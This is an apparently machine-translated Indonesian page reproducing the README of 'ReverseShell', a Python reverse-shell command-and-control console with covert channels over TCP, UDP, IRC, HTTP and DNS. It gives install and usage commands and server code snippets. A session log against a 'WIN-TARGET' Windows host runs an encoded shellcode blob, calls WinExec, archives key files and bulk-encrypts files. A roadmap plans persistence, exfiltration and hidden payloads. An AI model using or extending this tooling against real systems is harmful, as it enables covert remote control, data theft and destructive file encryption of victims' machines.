Beranda>Terkait pemrograman>Kode Sumber AI
Unduh

Reverseshell

Keterangan

Paket ini mengimplementasikan konsol shell terbalik tingkat lanjut (dukungan: TCP, UDP, IRC, HTTP dan DNS).

Versi 0.0.x - POC

  • Dukung shell terbalik dasar menggunakan netcat atau shell terbalik standar/dasar lainnya
  • Fitur Terminal Dasar
  • Perintah Sejarah
  • UDP
  • Multi-Sesi TCP (Perintah 1 Sesi/1)
  • Mengenkripsi data TCP dengan SSL
  • Mengenkripsi perintah dengan rc4
  • Sembunyikan Perintah dengan Protokol IRC
  • Sembunyikan Perintah dengan DNS (UDP) Protokol
  • Sembunyikan Perintah dengan Protokol HTTP
  • Fitur Terminal Lanjutan (paket spesifik yang diperlukan):
    • Cetak Nama Host Berwarna, Pengguna dan Direktori Saat Ini
    • Auto-Completion (executable di path dan file di direktori saat ini)
    • Diperbarui setiap kali Anda mengirim paket tertentu
  • Auto-restart untuk klien TCP
  • Paket TCP yang sangat besar (lebih besar dari jendela TCP) bekerja
  • Periksa apakah ada perintah (hanya dengan fitur shell terbalik canggih)

Versi 0.1.x - dev

  • Perintah builtins
    • Perbarui lingkungan
      • Direktori saat ini
      • File/executable
      • Kunci Enkripsi
      • Algoritma kompresi
        • Gzip, lzma, bz2, zlib
      • Pengkodean data
        • Basis: 16, 32, 64 85
    • Unggah dan unduh file (kompresi opsional)
    • Unduh file dari URL
    • Eksekusi Kode (untuk Python POC itu adalah eksekusi Python) (kompresi opsional)
    • Runner shellcode (kompresi opsional)
    • Enkripsi/dekripsi file tunggal/multipel dengan paralelisme (multi-pemrosesan) (sintaks GLOB Dukungan Enkripsi Multiple)
    • File arsip (berguna untuk mengunduh file mutliples dengan hanya satu perintah)
    • Hubungi DLL atau Fungsi Objek Bersama (misalnya menggunakan Win32 API)
  • Perbarui kunci enkripsi dengan nilai acak
    • Enkripsi baru didasarkan pada enkripsi preseden, tanpa semua kunci preseden Anda tidak dapat mendekripsi data

Versi 1.0.x - TODO

  • Instalasi otomatis (dalam memori dan/atau disimpan di disk)
    • Dari shell terbalik dasar
    • Dari protokol
      • WMI (Plugin Impacket?)
      • SMB (plugin impacket?)
  • Kegigihan
  • Exfiltrasi Data
  • Payload tersembunyi yang disimpan (untuk contoh dalam log windows atau registri)
  • Spawn Tty untuk Linux
  • Unduh Multiples Files pada soket temp lain (untuk paralelisme, berguna untuk mengekspor banyak data)
  • Menunggu untuk mengeksekusi perintah setelah menerimanya (menggunakan Beep , batas waktu soket , Sleep , proses anak, pekerja async atau ujung utas , print )
  • Thread, bukan proses

Contoh

Anda dapat membaca Multiples POC untuk klien shell terbalik yang ditulis dalam Python di direktori klien .

Saya menambahkan kunci publik dan pribadi untuk sertifikat SSL default, berguna untuk pengujian tetapi tidak aman, buat sertifikat Anda sendiri untuk melindungi data TCP Anda .

Persyaratan

Paket ini membutuhkan:

  • Python3
  • Perpustakaan Standar Python3
  • Pythontoolskit

Instalasi 

pip install ReverseShell

Penggunaan

Baris perintah 

python3 -m ReverseShell --help
python3 ReverseShell.pyz -h
ReverseShell # To test this command use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
ReverseShell -u -d # To test this command use the shellclientdns.py script. This is a DNS (UDP) reverse shell.
ReverseShell -H -T # To test this command use the shellclienthttp_advanced.py script. This is an advanced HTTP reverse shell.
ReverseShell -H -T -s # To test this command use the shellclienthttps_advanced.py script. This is an advanced HTTPS reverse shell.
ReverseShell -H -T -s -k " abcd " # To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.
ReverseShell -I # To test this command use the shellclientsocketirc.py script. This is an IRC reverse shell.
ReverseShell -T # To test this command use the shellclienttcp.py script. This is a multi-sessions TCP reverse shell.
ReverseShell -T # To test this command use the shellclienttcp_advanced.py script. This is an advanced multi-sessions TCP reverse shell.
ReverseShell -u # To test this command use the shellclientudp.py script. This is a UDP reverse shell.

Python3 

 from ReverseShell import ReverseShellSocketTcp , ReverseShell

with ReverseShellSocketTcp ( address = ( "127.0.0.1" , 1337 ), ssl = False , cert = None , key = None , handler = ReverseShell ) as shellserver :
    shellserver . serve_forever ()

# To test this code you can use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.

from ReverseShell import ReverseShellTcp , HttpReverseShell , partial

with ReverseShellTcp ( address = ( "127.0.0.1" , 1337 ), ssl = True , cert = "server.crt" , key = "server.key" , handler = partial ( HttpReverseShell , key = b"abcd" , encoding = "utf-8" )) as shellserver :
    shellserver . serve_forever ()

# To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.

Perintah Reverseshell Builtins 

 WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ call_library_function kernel32.dll WinExec "char *:calc.exe" "long:1"
Return value: 33
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ archive_files test.zip *.md *.key
Making archive...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ download_url http://google.com test.html
Done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ cd ..
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ update_environment
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ upload_file shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ download_file shellcode2.py
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ python3_exec print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ upload_file_compress shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ download_file_compress shellcode2.py
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ python3_exec_compress print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ shellcode SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==

WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ shellcode_compress SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==

WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_file test.html
[!] Invalid command detected for 'encrypt_files' command. Minimum 2 arguments are required.
[*] USAGE: encrypt_files [key] [filename1] [filename2] ... [filenameX]
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_file qwerty test.html
Encryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ decrypt_file qwerty test.html
Decryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_files qwerty *.html *.zip
Encryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ decrypt_files qwerty *.html *.zip
Decryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$

Tangkapan layar

Kontribusi

Anda dipersilakan untuk berkontribusi! Pengembang pemula, menengah dan lanjutan dapat berkontribusi pada repositori ini. Python Developpers, Administrator Sistem, Administrator Jaringan, Pengembang Web, dan pengembang bahasa yang dikompilasi dapat berkontribusi. Lihat masalah untuk mengetahui apa yang kita butuhkan.

Tautan

  • Halaman GitHub
  • Pypi
  • Dokumentasi
  • Dapat dieksekusi
  • Windows dapat dieksekusi
  • Klien Shell Binaries

Membantu 

 usage: ReverseShell.py [-h] [--udp | --tcp | --multi-tcp] [--http | --dns | --irc] [--no-color] [--key KEY] [--cert CERT] [--private PRIVATE] [--ip IP]
                       [--port PORT] [--encoding ENCODING] [--ssl] [--no-timeout]

Advanced reverse shell console.

options:
  -h, --help            show this help message and exit
  --udp, -u             Use UDP socket.
  --tcp, -t             Use TCP socket.
  --multi-tcp, -T       Create TCP socket for each command and responses.
  --http, -H            Use HTTP requests and responses.
  --dns, -d             Use DNS requests and responses.
  --irc, -I             Use IRC requests and response.
  --no-color, --color, -C
                        Do not use color
  --key KEY, -k KEY     Add a key to encrypt with RC4.
  --cert CERT, -c CERT  SSL cert file.
  --private PRIVATE, -P PRIVATE
                        SSL private key file.
  --ip IP, -i IP        IP address to start the ReverseShell server.
  --port PORT, -p PORT  UDP/TCP port to start the ReverseShell server.
  --encoding ENCODING, -e ENCODING
                        The reverse shell encoding used by client.
  --ssl, -s             Use SSL over TCP socket.
  --no-timeout, -m      Faster response but TCP data larger than Window maximum size will not work. You should use this argument with standard/basic
                        reverse shell like netcat.

Lisensi

Lisensi di bawah GPL, versi 3.

Memperluas
Informasi Tambahan
Aplikasi Terkait
Direkomendasikan untuk Anda
Informasi Terkait Semua